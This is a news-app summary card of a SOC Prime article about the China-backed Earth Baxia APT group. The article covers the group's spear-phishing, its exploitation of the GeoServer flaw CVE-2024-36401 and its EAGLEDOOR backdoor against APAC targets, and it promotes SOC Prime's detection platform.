A naukri.com initiative
Socprime
1M
164
Image Credit: Socprime
Earth Baxia Attack Detection: China-Backed Hackers Use Spear-Phishing, Exploit the GeoServer Vulnerability (CVE-2024-36401), and Apply a New EAGLEDOOR Malware to Target APAC
- China-backed Earth Baxia APT group have targeted a state agency in Taiwan and potentially other countries in the APAC region.
- APT groups from regions such as China, North Korea, Iran, and Russia demonstrated notably sophisticated and innovative adversary methods.
- Adversaries relied on spear-phishing, exploited a newly patched critical RCE vulnerability in OSGeo GeoServer GeoTools tracked as CVE-2024-36401, and leveraged a novel custom backdoor dubbed EAGLEDOOR.
- State-sponsored Chinese hackers are emerging in the forefront of nation-backed cyber threats.
- To detect Earth Baxia Attacks, security engineers might rely on SOC Prime Platform for collective cyber defense.
- China-backed Earth Baxia APT increasingly targets Taiwan and countries in the APAC region using GeoServer flaw (CVE-2024-36401) and EAGLEDOOR malware.
- Researchers suggest that government agencies, telecommunications firms, and energy industries in the Philippines, South Korea, Vietnam, Taiwan, and Thailand are likely the main targets.
- The compromise ultimately results in the deployment of either a custom backdoor dubbed EAGLEDOOR or a rogue installation of the red-team tool Cobalt Strike.
- The group leverages public cloud services to host its malicious files and currently shows no clear ties to other known APT groups.
- By leveraging SOC Prime’s Attack Detective SaaS solution, organizations can gain from real-time data and content audits for comprehensive threat visibility and improved detection coverage.
Read Full Article
9 Likes
For uninterrupted reading, download the app